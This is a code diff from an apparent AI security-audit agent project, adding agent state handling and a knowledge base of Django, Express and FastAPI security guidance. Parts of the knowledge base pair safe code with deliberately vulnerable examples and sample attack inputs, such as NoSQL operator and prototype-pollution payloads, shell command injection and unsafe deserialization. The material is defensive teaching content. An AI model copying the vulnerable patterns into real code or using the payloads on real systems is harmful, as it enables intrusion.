for node in self._agent_graph["nodes"].values():
|
||||
status = node.get("status", "unknown")
|
||||
if status in stats:
|
||||
stats[status] += 1
|
||||
|
||||
return stats
|
||||
|
||||
# ============ 清理 ============
|
||||
|
||||
def clear(self) -> None:
|
||||
"""清空注册表"""
|
||||
with self._lock:
|
||||
self._agent_graph = {"nodes": {}, "edges": []}
|
||||
self._agent_instances.clear()
|
||||
self._agent_states.clear()
|
||||
self._agent_messages.clear()
|
||||
self._running_agents.clear()
|
||||
self._root_agent_id = None
|
||||
logger.info("Agent registry cleared")
|
||||
|
||||
def cleanup_finished_agents(self) -> int:
|
||||
"""清理已完成的Agent"""
|
||||
with self._lock:
|
||||
finished_ids = [
|
||||
aid for aid, node in self._agent_graph["nodes"].items()
|
||||
if node["status"] in ["completed", "failed", "stopped"]
|
||||
]
|
||||
|
||||
for aid in finished_ids:
|
||||
# 保留节点信息,但清理实例
|
||||
self._agent_instances.pop(aid, None)
|
||||
self._running_agents.pop(aid, None)
|
||||
|
||||
return len(finished_ids)
|
||||
|
||||
|
||||
# 全局注册表实例
|
||||
agent_registry = AgentRegistry()
|
||||
|
|
@ -0,0 +1,297 @@
|
|||
"""
|
||||
Agent 状态管理模块
|
||||
|
||||
提供完整的Agent状态管理,支持:
|
||||
- 完整的生命周期管理
|
||||
- 状态序列化和持久化
|
||||
- 暂停和恢复
|
||||
- 动态Agent树结构
|
||||
"""
|
||||
|
||||
import uuid
|
||||
from datetime import datetime, timezone
|
||||
from enum import Enum
|
||||
from typing import Any, Dict, List, Optional
|
||||
from pydantic import BaseModel, Field
|
||||
|
||||
|
||||
def _generate_agent_id() -> str:
|
||||
"""生成唯一的Agent ID"""
|
||||
return f"agent_{uuid.uuid4().hex[:8]}"
|
||||
|
||||
|
||||
class AgentStatus(str, Enum):
|
||||
"""Agent 运行状态"""
|
||||
CREATED = "created" # 已创建,未开始
|
||||
RUNNING = "running" # 运行中
|
||||
WAITING = "waiting" # 等待中(等待消息或输入)
|
||||
PAUSED = "paused" # 已暂停
|
||||
COMPLETED = "completed" # 已完成
|
||||
FAILED = "failed" # 失败
|
||||
STOPPED = "stopped" # 被停止
|
||||
STOPPING = "stopping" # 正在停止
|
||||
|
||||
|
||||
class AgentState(BaseModel):
|
||||
"""
|
||||
Agent 状态模型
|
||||
|
||||
包含Agent执行所需的所有状态信息,支持:
|
||||
- 完整的生命周期管理
|
||||
- 状态序列化和持久化
|
||||
- 暂停和恢复
|
||||
- 动态Agent树结构
|
||||
"""
|
||||
|
||||
# ============ 基本信息 ============
|
||||
agent_id: str = Field(default_factory=_generate_agent_id)
|
||||
agent_name: str = "DeepAudit Agent"
|
||||
agent_type: str = "generic" # recon, analysis, verification, specialist
|
||||
parent_id: Optional[str] = None # 父Agent ID(用于动态Agent树)
|
||||
|
||||
# ============ 任务信息 ============
|
||||
task: str = ""
|
||||
task_context: Dict[str, Any] = Field(default_factory=dict)
|
||||
inherited_context: Dict[str, Any] = Field(default_factory=dict) # 从父Agent继承的上下文
|
||||
|
||||
# ============ 知识模块 ============
|
||||
knowledge_modules: List[str] = Field(default_factory=list) # 加载的知识模块名称
|
||||
|
||||
# ============ 执行状态 ============
|
||||
status: AgentStatus = AgentStatus.CREATED
|
||||
iteration: int = 0
|
||||
max_iterations: int = 50
|
||||
|
||||
# ============ 对话历史 ============
|
||||
messages: List[Dict[str, Any]] = Field(default_factory=list)
|
||||
system_prompt: str = ""
|
||||
|
||||
# ============ 执行记录 ============
|
||||
actions_taken: List[Dict[str, Any]] = Field(default_factory=list)
|
||||
observations: List[Dict[str, Any]] = Field(default_factory=list)
|
||||
errors: List[str] = Field(default_factory=list)
|
||||
|
||||
# ============ 发现列表 ============
|
||||
findings: List[Dict[str, Any]] = Field(default_factory=list)
|
||||
|
||||
# ============ 时间戳 ============
|
||||
created_at: str = Field(default_factory=lambda: datetime.now(timezone.utc).isoformat())
|
||||
started_at: Optional[str] = None
|
||||
last_updated: str = Field(default_factory=lambda: datetime.now(timezone.utc).isoformat())
|
||||
finished_at: Optional[str] = None
|
||||
|
||||
# ============ 等待状态 ============
|
||||
waiting_for_input: bool = False
|
||||
waiting_start_time: Optional[datetime] = None
|
||||
waiting_reason: str = ""
|
||||
waiting_timeout_seconds: int = 600 # 10分钟超时
|
||||
|
||||
# ============ 最终结果 ============
|
||||
final_result: Optional[Dict[str, Any]] = None
|
||||
|
||||
# ============ 统计信息 ============
|
||||
total_tokens: int = 0
|
||||
tool_calls: int = 0
|
||||
|
||||
# ============ 标志位 ============
|
||||
stop_requested: bool = False
|
||||
max_iterations_warning_sent: bool = False
|
||||
|
||||
class Config:
|
||||
use_enum_values = True
|
||||
|
||||
# ============ 状态管理方法 ============
|
||||
|
||||
def start(self) -> None:
|
||||
"""开始执行"""
|
||||
self.status = AgentStatus.RUNNING
|
||||
self.started_at = datetime.now(timezone.utc).isoformat()
|
||||
self._update_timestamp()
|
||||
|
||||
def increment_iteration(self) -> None:
|
||||
"""增加迭代次数"""
|
||||
self.iteration += 1
|
||||
self._update_timestamp()
|
||||
|
||||
def set_completed(self, final_result: Optional[Dict[str, Any]] = None) -> None:
|
||||
"""标记为完成"""
|
||||
self.status = AgentStatus.COMPLETED
|
||||
self.final_result = final_result
|
||||
self.finished_at = datetime.now(timezone.utc).isoformat()
|
||||
self._update_timestamp()
|
||||
|
||||
def set_failed(self, error: str) -> None:
|
||||
"""标记为失败"""
|
||||
self.status = AgentStatus.FAILED
|
||||
self.add_error(error)
|
||||
self.finished_at = datetime.now(timezone.utc).isoformat()
|
||||
self._update_timestamp()
|
||||
|
||||
def request_stop(self) -> None:
|
||||
"""请求停止"""
|
||||
self.stop_requested = True
|
||||
self.status = AgentStatus.STOPPING
|
||||
self._update_timestamp()
|
||||
|
||||
def set_stopped(self) -> None:
|
||||
"""标记为已停止"""
|
||||
self.status = AgentStatus.STOPPED
|
||||
self.finished_at = datetime.now(timezone.utc).isoformat()
|
||||
self._update_timestamp()
|
||||
|
||||
# ============ 等待状态管理 ============
|
||||
|
||||
def enter_waiting_state(self, reason: str = "等待消息") -> None:
|
||||
"""进入等待状态"""
|
||||
self.waiting_for_input = True
|
||||
self.waiting_start_time = datetime.now(timezone.utc)
|
||||
self.waiting_reason = reason
|
||||
self.status = AgentStatus.WAITING
|
||||
self._update_timestamp()
|
||||
|
||||
def resume_from_waiting(self, new_task: Optional[str] = None) -> None:
|
||||
"""从等待状态恢复"""
|
||||
self.waiting_for_input = False
|
||||
self.waiting_start_time = None
|
||||
self.waiting_reason = ""
|
||||
self.stop_requested = False
|
||||
self.status = AgentStatus.RUNNING
|
||||
if new_task:
|
||||
self.task = new_task
|
||||
self._update_timestamp()
|
||||
|
||||
def has_waiting_timeout(self) -> bool:
|
||||
"""检查等待是否超时"""
|
||||
if not self.waiting_for_input or not self.waiting_start_time:
|
||||
return False
|
||||
|
||||
if self.stop_requested or self.status in [AgentStatus.COMPLETED, AgentStatus.FAILED]:
|
||||
return False
|
||||
|
||||
elapsed = (datetime.now(timezone.utc) - self.waiting_start_time).total_seconds()
|
||||
return elapsed > self.waiting_timeout_seconds
|
||||
|
||||
def is_waiting_for_input(self) -> bool:
|
||||
"""是否在等待输入"""
|
||||
return self.waiting_for_input
|
||||
|
||||
# ============ 执行控制 ============
|
||||
|
||||
def should_stop(self) -> bool:
|
||||
"""是否应该停止"""
|
||||
return (
|
||||
self.stop_requested or
|
||||
self.status in [AgentStatus.COMPLETED, AgentStatus.FAILED, AgentStatus.STOPPED] or
|
||||
self.has_reached_max_iterations()
|
||||
)
|
||||
|
||||
def has_reached_max_iterations(self) -> bool:
|
||||
"""是否达到最大迭代次数"""
|
||||
return self.iteration >= self.max_iterations
|
||||
|
||||
def is_approaching_max_iterations(self, threshold: float = 0.85) -> bool:
|
||||
"""是否接近最大迭代次数"""
|
||||
return self.iteration >= int(self.max_iterations * threshold)
|
||||
|
||||
# ============ 消息管理 ============
|
||||
|
||||
def add_message(self, role: str, content: Any) -> None:
|
||||
"""添加消息"""
|
||||
self.messages.append({
|
||||
"role": role,
|
||||
"content": content,
|
||||
"timestamp": datetime.now(timezone.utc).isoformat(),
|
||||
})
|
||||
self._update_timestamp()
|
||||
|
||||
def get_conversation_history(self) -> List[Dict[str, Any]]:
|
||||
"""获取对话历史(不含时间戳,用于LLM调用)"""
|
||||
return [{"role": m["role"], "content": m["content"]} for m in self.messages]
|
||||
|
||||
# ============ 执行记录 ============
|
||||
|
||||
def add_action(self, action: Dict[str, Any]) -> None:
|
||||
"""记录执行的动作"""
|
||||
self.actions_taken.append({
|
||||
"iteration": self.iteration,
|
||||
"timestamp": datetime.now(timezone.utc).isoformat(),
|
||||
"action": action,
|
||||
})
|
||||
self.tool_calls += 1
|
||||
self._update_timestamp()
|
||||
|
||||
def add_observation(self, observation: Dict[str, Any]) -> None:
|
||||
"""记录观察结果"""
|
||||
self.observations.append({
|
||||
"iteration": self.iteration,
|
||||
"timestamp": datetime.now(timezone.utc).isoformat(),
|
||||
"observation": observation,
|
||||
})
|
||||
self._update_timestamp()
|
||||
|
||||
def add_error(self, error: str) -> None:
|
||||
"""记录错误"""
|
||||
self.errors.append(f"Iteration {self.iteration}: {error}")
|
||||
self._update_timestamp()
|
||||
|
||||
def add_finding(self, finding: Dict[str, Any]) -> None:
|
||||
"""添加发现"""
|
||||
finding["discovered_at"] = datetime.now(timezone.utc).isoformat()
|
||||
finding["discovered_by"] = self.agent_id
|
||||
self.findings.append(finding)
|
||||
self._update_timestamp()
|
||||
|
||||
# ============ 上下文管理 ============
|
||||
|
||||
def update_context(self, key: str, value: Any) -> None:
|
||||
"""更新任务上下文"""
|
||||
self.task_context[key] = value
|
||||
self._update_timestamp()
|
||||
|
||||
def inherit_context(self, parent_context: Dict[str, Any]) -> None:
|
||||
"""继承父Agent的上下文"""
|
||||
self.inherited_context = parent_context.copy()
|
||||
self._update_timestamp()
|
||||
|
||||
# ============ 统计和摘要 ============
|
||||
|
||||
def add_tokens(self, tokens: int) -> None:
|
||||
"""添加token使用量"""
|
||||
self.total_tokens += tokens
|
||||
self._update_timestamp()
|
||||
|
||||
def get_execution_summary(self) -> Dict[str, Any]:
|
||||
"""获取执行摘要"""
|
||||
return {
|
||||
"agent_id": self.agent_id,
|
||||
"agent_name": self.agent_name,
|
||||
"agent_type": self.agent_type,
|
||||
"parent_id": self.parent_id,
|
||||
"task": self.task,
|
||||
"status": self.status,
|
||||
"iteration": self.iteration,
|
||||
"max_iterations": self.max_iterations,
|
||||
"total_tokens": self.total_tokens,
|
||||
"tool_calls": self.tool_calls,
|
||||
"findings_count": len(self.findings),
|
||||
"errors_count": len(self.errors),
|
||||
"created_at": self.created_at,
|
||||
"started_at": self.started_at,
|
||||
"finished_at": self.finished_at,
|
||||
"duration_seconds": self._calculate_duration(),
|
||||
"knowledge_modules": self.knowledge_modules,
|
||||
}
|
||||
|
||||
def _calculate_duration(self) -> Optional[float]:
|
||||
"""计算执行时长"""
|
||||
if not self.started_at:
|
||||
return None
|
||||
|
||||
end_time = self.finished_at or datetime.now(timezone.utc).isoformat()
|
||||
start = datetime.fromisoformat(self.started_at.replace('Z', '+00:00'))
|
||||
end = datetime.fromisoformat(end_time.replace('Z', '+00:00'))
|
||||
return (end - start).total_seconds()
|
||||
|
||||
def _update_timestamp(self) -> None:
|
||||
"""更新最后修改时间"""
|
||||
self.last_updated = datetime.now(timezone.utc).isoformat()
|
||||
|
|
@ -354,7 +354,7 @@ class EventManager:
|
|||
"""创建或获取事件队列"""
|
||||
if task_id not in self._event_queues:
|
||||
# 🔥 使用较大的队列容量,缓存更多 token 事件
|
||||
self._event_queues[task_id] = asyncio.Queue(maxsize=1000)
|
||||
self._event_queues[task_id] = asyncio.Queue(maxsize=5000)
|
||||
return self._event_queues[task_id]
|
||||
|
||||
def remove_queue(self, task_id: str):
|
||||
|
|
|
|||
|
|
@ -193,17 +193,36 @@ class AgentRunner:
|
|||
"""初始化工具集"""
|
||||
await self.event_emitter.emit_info("初始化 Agent 工具集...")
|
||||
|
||||
# 🔥 导入新工具
|
||||
from app.services.agent.tools import (
|
||||
ThinkTool, ReflectTool,
|
||||
CreateVulnerabilityReportTool,
|
||||
)
|
||||
# 🔥 导入知识查询工具
|
||||
from app.services.agent.knowledge import (
|
||||
SecurityKnowledgeQueryTool,
|
||||
GetVulnerabilityKnowledgeTool,
|
||||
)
|
||||
|
||||
# 🔥 获取排除模式和目标文件
|
||||
exclude_patterns = self.task.exclude_patterns or []
|
||||
target_files = self.task.target_files or None
|
||||
|
||||
# ============ 基础工具(所有 Agent 共享)============
|
||||
base_tools = {
|
||||
"read_file": FileReadTool(self.project_root),
|
||||
"list_files": ListFilesTool(self.project_root),
|
||||
"read_file": FileReadTool(self.project_root, exclude_patterns, target_files),
|
||||
"list_files": ListFilesTool(self.project_root, exclude_patterns, target_files),
|
||||
# 🔥 新增:思考工具(所有Agent可用)
|
||||
"think": ThinkTool(),
|
||||
}
|
||||
|
||||
# ============ Recon Agent 专属工具 ============
|
||||
# 职责:信息收集、项目结构分析、技术栈识别
|
||||
self.recon_tools = {
|
||||
**base_tools,
|
||||
"search_code": FileSearchTool(self.project_root),
|
||||
"search_code": FileSearchTool(self.project_root, exclude_patterns, target_files),
|
||||
# 🔥 新增:反思工具
|
||||
"reflect": ReflectTool(),
|
||||
}
|
||||
|
||||
# RAG 工具(Recon 用于语义搜索)
|
||||
|
|
@ -214,10 +233,11 @@ class AgentRunner:
|
|||
# 职责:漏洞分析、代码审计、模式匹配
|
||||
self.analysis_tools = {
|
||||
**base_tools,
|
||||
"search_code": FileSearchTool(self.project_root),
|
||||
"search_code": FileSearchTool(self.project_root, exclude_patterns, target_files),
|
||||
# 模式匹配和代码分析
|
||||
"pattern_match": PatternMatchTool(self.project_root),
|
||||
"code_analysis": CodeAnalysisTool(self.llm_service),
|
||||
# TODO: code_analysis 工具暂时禁用,因为 LLM 调用经常失败
|
||||
# "code_analysis": CodeAnalysisTool(self.llm_service),
|
||||
"dataflow_analysis": DataFlowAnalysisTool(self.llm_service),
|
||||
# 外部静态分析工具
|
||||
"semgrep_scan": SemgrepTool(self.project_root),
|
||||
|
|
@ -227,6 +247,11 @@ class AgentRunner:
|
|||
"npm_audit": NpmAuditTool(self.project_root),
|
||||
"safety_scan": SafetyTool(self.project_root),
|
||||
"osv_scan": OSVScannerTool(self.project_root),
|
||||
# 🔥 新增:反思工具
|
||||
"reflect": ReflectTool(),
|
||||
# 🔥 新增:安全知识查询工具(基于RAG)
|
||||
"query_security_knowledge": SecurityKnowledgeQueryTool(),
|
||||
"get_vulnerability_knowledge": GetVulnerabilityKnowledgeTool(),
|
||||
}
|
||||
|
||||
# RAG 工具(Analysis 用于安全相关代码搜索)
|
||||
|
|
@ -241,6 +266,10 @@ class AgentRunner:
|
|||
# 验证工具
|
||||
"vulnerability_validation": VulnerabilityValidationTool(self.llm_service),
|
||||
"dataflow_analysis": DataFlowAnalysisTool(self.llm_service),
|
||||
# 🔥 新增:漏洞报告工具(仅Verification可用)
|
||||
"create_vulnerability_report": CreateVulnerabilityReportTool(),
|
||||
# 🔥 新增:反思工具
|
||||
"reflect": ReflectTool(),
|
||||
}
|
||||
|
||||
# 沙箱工具(仅 Verification Agent 可用)
|
||||
|
|
|
|||
|
|
@ -0,0 +1,59 @@
|
|||
"""
|
||||
知识模块系统 - 基于RAG的安全知识检索
|
||||
|
||||
提供专业的安全知识检索能力,支持:
|
||||
- 漏洞类型知识(SQL注入、XSS、命令注入等)
|
||||
- 框架安全知识(FastAPI、Django、Flask、Express等)
|
||||
- 安全最佳实践
|
||||
- 修复建议
|
||||
- 代码模式识别
|
||||
|
||||
知识库采用模块化组织:
|
||||
- vulnerabilities/: 漏洞类型知识
|
||||
- frameworks/: 框架安全知识
|
||||
"""
|
||||
|
||||
# 基础定义
|
||||
from .base import KnowledgeDocument, KnowledgeCategory
|
||||
|
||||
# 知识加载器
|
||||
from .loader import (
|
||||
KnowledgeLoader,
|
||||
knowledge_loader,
|
||||
get_available_modules,
|
||||
get_module_content,
|
||||
)
|
||||
|
||||
# RAG知识检索
|
||||
from .rag_knowledge import (
|
||||
SecurityKnowledgeRAG,
|
||||
security_knowledge_rag,
|
||||
)
|
||||
|
||||
# 知识查询工具
|
||||
from .tools import (
|
||||
SecurityKnowledgeQueryTool,
|
||||
GetVulnerabilityKnowledgeTool,
|
||||
ListKnowledgeModulesTool,
|
||||
)
|
||||
|
||||
__all__ = [
|
||||
# 基础定义
|
||||
"KnowledgeDocument",
|
||||
"KnowledgeCategory",
|
||||
|
||||
# 知识加载器
|
||||
"KnowledgeLoader",
|
||||
"knowledge_loader",
|
||||
"get_available_modules",
|
||||
"get_module_content",
|
||||
|
||||
# RAG知识检索
|
||||
"SecurityKnowledgeRAG",
|
||||
"security_knowledge_rag",
|
||||
|
||||
# 知识查询工具
|
||||
"SecurityKnowledgeQueryTool",
|
||||
"GetVulnerabilityKnowledgeTool",
|
||||
"ListKnowledgeModulesTool",
|
||||
]
|
||||
|
|
@ -0,0 +1,61 @@
|
|||
"""
|
||||
知识模块基础定义
|
||||
|
||||
定义知识文档的数据结构和类别
|
||||
"""
|
||||
|
||||
from dataclasses import dataclass, field
|
||||
from enum import Enum
|
||||
from typing import Any, Dict, List, Optional
|
||||
|
||||
|
||||
class KnowledgeCategory(Enum):
|
||||
"""知识类别"""
|
||||
VULNERABILITY = "vulnerability" # 漏洞类型
|
||||
FRAMEWORK = "framework" # 框架安全
|
||||
BEST_PRACTICE = "best_practice" # 最佳实践
|
||||
REMEDIATION = "remediation" # 修复建议
|
||||
CODE_PATTERN = "code_pattern" # 代码模式
|
||||
COMPLIANCE = "compliance" # 合规要求
|
||||
|
||||
|
||||
@dataclass
|
||||
class KnowledgeDocument:
|
||||
"""知识文档"""
|
||||
id: str
|
||||
title: str
|
||||
content: str
|
||||
category: KnowledgeCategory
|
||||
tags: List[str] = field(default_factory=list)
|
||||
severity: Optional[str] = None
|
||||
cwe_ids: List[str] = field(default_factory=list)
|
||||
owasp_ids: List[str] = field(default_factory=list)
|
||||
metadata: Dict[str, Any] = field(default_factory=dict)
|
||||
|
||||
def to_dict(self) -> Dict[str, Any]:
|
||||
return {
|
||||
"id": self.id,
|
||||
"title": self.title,
|
||||
"content": self.content,
|
||||
"category": self.category.value,
|
||||
"tags": self.tags,
|
||||
"severity": self.severity,
|
||||
"cwe_ids": self.cwe_ids,
|
||||
"owasp_ids": self.owasp_ids,
|
||||
"metadata": self.metadata,
|
||||
}
|
||||
|
||||
def to_embedding_text(self) -> str:
|
||||
"""生成用于嵌入的文本"""
|
||||
parts = [
|
||||
f"Title: {self.title}",
|
||||
f"Category: {self.category.value}",
|
||||
]
|
||||
if self.tags:
|
||||
parts.append(f"Tags: {', '.join(self.tags)}")
|
||||
if self.cwe_ids:
|
||||
parts.append(f"CWE: {', '.join(self.cwe_ids)}")
|
||||
if self.owasp_ids:
|
||||
parts.append(f"OWASP: {', '.join(self.owasp_ids)}")
|
||||
parts.append(f"Content: {self.content}")
|
||||
return "\n".join(parts)
|
||||
|
|
@ -0,0 +1,32 @@
|
|||
"""
|
||||
框架安全知识模块
|
||||
|
||||
包含各种框架的安全特性和常见漏洞模式
|
||||
"""
|
||||
|
||||
from .fastapi import FASTAPI_SECURITY
|
||||
from .django import DJANGO_SECURITY
|
||||
from .flask import FLASK_SECURITY
|
||||
from .express import EXPRESS_SECURITY
|
||||
from .react import REACT_SECURITY
|
||||
from .supabase import SUPABASE_SECURITY
|
||||
|
||||
# 所有框架知识文档
|
||||
ALL_FRAMEWORK_DOCS = [
|
||||
FASTAPI_SECURITY,
|
||||
DJANGO_SECURITY,
|
||||
FLASK_SECURITY,
|
||||
EXPRESS_SECURITY,
|
||||
REACT_SECURITY,
|
||||
SUPABASE_SECURITY,
|
||||
]
|
||||
|
||||
__all__ = [
|
||||
"ALL_FRAMEWORK_DOCS",
|
||||
"FASTAPI_SECURITY",
|
||||
"DJANGO_SECURITY",
|
||||
"FLASK_SECURITY",
|
||||
"EXPRESS_SECURITY",
|
||||
"REACT_SECURITY",
|
||||
"SUPABASE_SECURITY",
|
||||
]
|
||||
|
|
@ -0,0 +1,117 @@
|
|||
"""
|
||||
Django 框架安全知识
|
||||
"""
|
||||
|
||||
from ..base import KnowledgeDocument, KnowledgeCategory
|
||||
|
||||
|
||||
DJANGO_SECURITY = KnowledgeDocument(
|
||||
id="framework_django",
|
||||
title="Django Security",
|
||||
category=KnowledgeCategory.FRAMEWORK,
|
||||
tags=["django", "python", "web", "orm"],
|
||||
content="""
|
||||
Django 内置了许多安全保护,但不当使用仍可能引入漏洞。
|
||||
|
||||
## 内置安全特性
|
||||
1. CSRF保护
|
||||
2. XSS防护(模板自动转义)
|
||||
3. SQL注入防护(ORM)
|
||||
4. 点击劫持防护
|
||||
5. 安全的密码哈希
|
||||
|
||||
## 常见漏洞模式
|
||||
|
||||
### SQL注入
|
||||
```python
|
||||
# 危险 - raw()和extra()
|
||||
User.objects.raw(f"SELECT * FROM users WHERE name = '{name}'")
|
||||
User.objects.extra(where=[f"name = '{name}'"])
|
||||
|
||||
# 危险 - RawSQL
|
||||
from django.db.models.expressions import RawSQL
|
||||
User.objects.annotate(val=RawSQL(f"SELECT {user_input}"))
|
||||
|
||||
# 安全 - 使用ORM
|
||||
User.objects.filter(name=name)
|
||||
User.objects.raw("SELECT * FROM users WHERE name = %s", [name])
|
||||
```
|
||||
|
||||
### XSS
|
||||
```python
|
||||
# 危险 - 禁用自动转义
|
||||
{{ user_input|safe }}
|
||||
{% autoescape off %}{{ user_input }}{% endautoescape %}
|
||||
mark_safe(user_input)
|
||||
|
||||
# 安全 - 默认转义
|
||||
{{ user_input }}
|
||||
```
|
||||
|
||||
### CSRF绕过
|
||||
```python
|
||||
# 危险 - 禁用CSRF
|
||||
@csrf_exempt
|
||||
def my_view(request):
|
||||
pass
|
||||
|
||||
# 危险 - 全局禁用
|
||||
MIDDLEWARE = [
|
||||
# 'django.middleware.csrf.CsrfViewMiddleware', # 被注释
|
||||
]
|
||||
```
|
||||
|
||||
### 不安全的反序列化
|
||||
```python
|
||||
# 危险 - 签名数据可被篡改
|
||||
from django.core import signing
|
||||
data = signing.loads(user_input) # 如果SECRET_KEY泄露
|
||||
|
||||
# 危险 - pickle
|
||||
import pickle
|
||||
data = pickle.loads(request.body)
|
||||
```
|
||||
|
||||
### 敏感信息泄露
|
||||
```python
|
||||
# 危险 - DEBUG模式在生产环境
|
||||
DEBUG = True # settings.py
|
||||
|
||||
# 危险 - 详细错误信息
|
||||
ALLOWED_HOSTS = [] # 空列表在DEBUG=False时会报错
|
||||
```
|
||||
|
||||
### 文件上传
|
||||
```python
|
||||
# 危险 - 不验证文件类型
|
||||
def upload(request):
|
||||
file = request.FILES['file']
|
||||
with open(f'/uploads/{file.name}', 'wb') as f:
|
||||
f.write(file.read())
|
||||
|
||||
# 安全 - 验证和重命名
|
||||
import uuid
|
||||
def upload(request):
|
||||
file = request.FILES['file']
|
||||
ext = os.path.splitext(file.name)[1].lower()
|
||||
if ext not in ['.jpg', '.png', '.pdf']:
|
||||
raise ValidationError("Invalid file type")
|
||||
safe_name = f"{uuid.uuid4()}{ext}"
|
||||
# 使用Django的文件存储
|
||||
default_storage.save(safe_name, file)
|
||||
```
|
||||
|
||||
## 安全配置检查
|
||||
```python
|
||||
# settings.py 安全配置
|
||||
DEBUG = False
|
||||
SECRET_KEY = os.environ.get('DJANGO_SECRET_KEY')
|
||||
ALLOWED_HOSTS = ['example.com']
|
||||
SECURE_SSL_REDIRECT = True
|
||||
SESSION_COOKIE_SECURE = True
|
||||
CSRF_COOKIE_SECURE = True
|
||||
SECURE_HSTS_SECONDS = 31536000
|
||||
X_FRAME_OPTIONS = 'DENY'
|
||||
```
|
||||
""",
|
||||
)
|
||||
|
|
@ -0,0 +1,148 @@
|
|||
"""
|
||||
Express.js 框架安全知识
|
||||
"""
|
||||
|
||||
from ..base import KnowledgeDocument, KnowledgeCategory
|
||||
|
||||
|
||||
EXPRESS_SECURITY = KnowledgeDocument(
|
||||
id="framework_express",
|
||||
title="Express.js Security",
|
||||
category=KnowledgeCategory.FRAMEWORK,
|
||||
tags=["express", "nodejs", "javascript", "api"],
|
||||
content="""
|
||||
Express.js 是Node.js最流行的Web框架,需要注意多种安全问题。
|
||||
|
||||
## 常见漏洞模式
|
||||
|
||||
### NoSQL注入
|
||||
```javascript
|
||||
// 危险 - MongoDB查询注入
|
||||
app.post('/login', async (req, res) => {
|
||||
const user = await User.findOne({
|
||||
username: req.body.username,
|
||||
password: req.body.password
|
||||
});
|
||||
// 攻击: {"username": {"$ne": ""}, "password": {"$ne": ""}}
|
||||
});
|
||||
|
||||
// 安全 - 类型验证
|
||||
app.post('/login', async (req, res) => {
|
||||
const { username, password } = req.body;
|
||||
if (typeof username !== 'string' || typeof password !== 'string') {
|
||||
return res.status(400).json({ error: 'Invalid input' });
|
||||
}
|
||||
const user = await User.findOne({ username, password });
|
||||
});
|
||||
```
|
||||
|
||||
### 原型污染
|
||||
```javascript
|
||||
// 危险 - 合并用户输入
|
||||
const merge = require('lodash.merge');
|
||||
app.post('/config', (req, res) => {
|
||||
merge(config, req.body);
|
||||
// 攻击: {"__proto__": {"isAdmin": true}}
|
||||
});
|
||||
|
||||
// 安全 - 使用Object.assign或白名单
|
||||
app.post('/config', (req, res) => {
|
||||
const allowed = ['theme', 'language'];
|
||||
allowed.forEach(key => {
|
||||
if (req.body[key]) config[key] = req.body[key];
|
||||
});
|
||||
});
|
||||
```
|
||||
|
||||
### 命令注入
|
||||
```javascript
|
||||
// 危险
|
||||
const { exec } = require('child_process');
|
||||
app.get('/ping', (req, res) => {
|
||||
exec(`ping ${req.query.host}`, (err, stdout) => {
|
||||
res.send(stdout);
|
||||
});
|
||||
});
|
||||
|
||||
// 安全 - 使用execFile和参数数组
|
||||
const { execFile } = require('child_process');
|
||||
app.get('/ping', (req, res) => {
|
||||
execFile('ping', ['-c', '4', req.query.host], (err, stdout) => {
|
||||
res.send(stdout);
|
||||
});
|
||||
});
|
||||
```
|
||||
|
||||
### XSS
|
||||
```javascript
|
||||
// 危险 - 直接输出用户输入
|
||||
app.get('/search', (req, res) => {
|
||||
res.send(`<h1>Results for: ${req.query.q}</h1>`);
|
||||
});
|
||||
|
||||
// 安全 - 使用模板引擎或转义
|
||||
const escape = require('escape-html');
|
||||
app.get('/search', (req, res) => {
|
||||
res.send(`<h1>Results for: ${escape(req.query.q)}</h1>`);
|
||||
});
|
||||
```
|
||||
|
||||
### 路径遍历
|
||||
```javascript
|
||||
// 危险
|
||||
app.get('/files/:name', (req, res) => {
|
||||
res.sendFile(`/uploads/${req.params.name}`);
|
||||
});
|
||||
|
||||
// 安全 - 验证路径
|
||||
const path = require('path');
|
||||
app.get('/files/:name', (req, res) => {
|
||||
const safePath = path.join('/uploads', req.params.name);
|
||||
if (!safePath.startsWith('/uploads/')) {
|
||||
return res.status(400).send('Invalid path');
|
||||
}
|
||||
res.sendFile(safePath);
|
||||
});
|
||||
```
|
||||
|
||||
### 不安全的依赖
|
||||
```javascript
|
||||
// 危险 - 使用有漏洞的包
|
||||
const serialize = require('node-serialize');
|
||||
const obj = serialize.unserialize(userInput); // RCE!
|
||||
|
||||
// 安全 - 使用JSON
|
||||
const obj = JSON.parse(userInput);
|
||||
```
|
||||
|
||||
## 安全中间件
|
||||
```javascript
|
||||
const helmet = require('helmet');
|
||||
const rateLimit = require('express-rate-limit');
|
||||
|
||||
// 安全头
|
||||
app.use(helmet());
|
||||
|
||||
// 速率限制
|
||||
app.use(rateLimit({
|
||||
windowMs: 15 * 60 * 1000,
|
||||
max: 100
|
||||
}));
|
||||
|
||||
// CORS
|
||||
const cors = require('cors');
|
||||
app.use(cors({
|
||||
origin: 'https://example.com',
|
||||
credentials: true
|
||||
}));
|
||||
```
|
||||
|
||||
## 安全检查清单
|
||||
1. 使用helmet设置安全头
|
||||
2. 实现速率限制
|
||||
3. 验证所有用户输入类型
|
||||
4. 使用参数化查询
|
||||
5. 定期更新依赖 (npm audit)
|
||||
6. 不要在错误中暴露堆栈信息
|
||||
""",
|
||||
)
|
||||
|
|
@ -0,0 +1,109 @@
|
|||
"""
|
||||
FastAPI 框架安全知识
|
||||
"""
|
||||
|
||||
from ..base import KnowledgeDocument, KnowledgeCategory
|
||||
|
||||
|
||||
FASTAPI_SECURITY = KnowledgeDocument(
|
||||
id="framework_fastapi",
|
||||
title="FastAPI Security",
|
||||
category=KnowledgeCategory.FRAMEWORK,
|
||||
tags=["fastapi", "python", "api", "async", "pydantic"],
|
||||
content="""
|
||||
FastAPI 是一个现代Python Web框架,内置了许多安全特性,但仍需注意一些常见问题。
|
||||
|
||||
## 安全特性
|
||||
1. Pydantic自动数据验证
|
||||
2. 自动生成OpenAPI文档
|
||||
3. 内置OAuth2/JWT支持
|
||||
4. 依赖注入系统
|
||||
|
||||
## 常见漏洞模式
|
||||
|
||||
### SQL注入
|
||||
```python
|
||||
# 危险 - 原始SQL
|
||||
@app.get("/users")
|
||||
async def get_users(name: str):
|
||||
query = f"SELECT * FROM users WHERE name = '{name}'"
|
||||
return await database.fetch_all(query)
|
||||
|
||||
# 安全 - 参数化查询
|
||||
@app.get("/users")
|
||||
async def get_users(name: str):
|
||||
query = "SELECT * FROM users WHERE name = :name"
|
||||
return await database.fetch_all(query, {"name": name})
|
||||
```
|
||||
|
||||
### IDOR
|
||||
```python
|
||||
# 危险 - 无权限检查
|
||||
@app.get("/users/{user_id}")
|
||||
async def get_user(user_id: int):
|
||||
return await User.get(user_id)
|
||||
|
||||
# 安全 - 验证权限
|
||||
@app.get("/users/{user_id}")
|
